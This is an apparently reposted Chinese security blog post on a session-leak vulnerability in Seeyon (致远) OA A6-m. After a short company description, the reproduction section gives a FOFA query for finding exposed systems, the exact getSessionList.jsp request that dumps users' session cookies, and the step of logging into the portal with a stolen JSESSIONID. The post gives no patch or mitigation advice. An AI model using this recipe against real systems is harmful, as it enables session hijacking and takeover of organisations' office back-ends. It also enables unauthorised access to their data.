本文转载于公众号:融云攻防实验室,原文地址:
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
致远OA办公自动化软件,用于OA办公自动化软件的开发销售。2010年,用友致远更名为致远协创。2017年更名为致远互联。北京致远互联软件股份有限公司(简称:致远互联)成立于2002年3月,总部设立在北京,是一家集协同办公产品的设计、研发、销售及服务为一体的企业。致远OA A6-m等业务系统,getSessionList.jsp处存在Session泄漏漏洞,攻击者通过漏洞可以获取登录cookie,导致业务后台失陷。
0x03 漏洞复现
fofa:app=”致远互联-OA”
1.执行POC读取用户cookie
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
2.使用session登录主页即可
http://x.x.x.x/yyoa/portal/portalIndex.jsp
JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXXXXX
THE END
暂无评论内容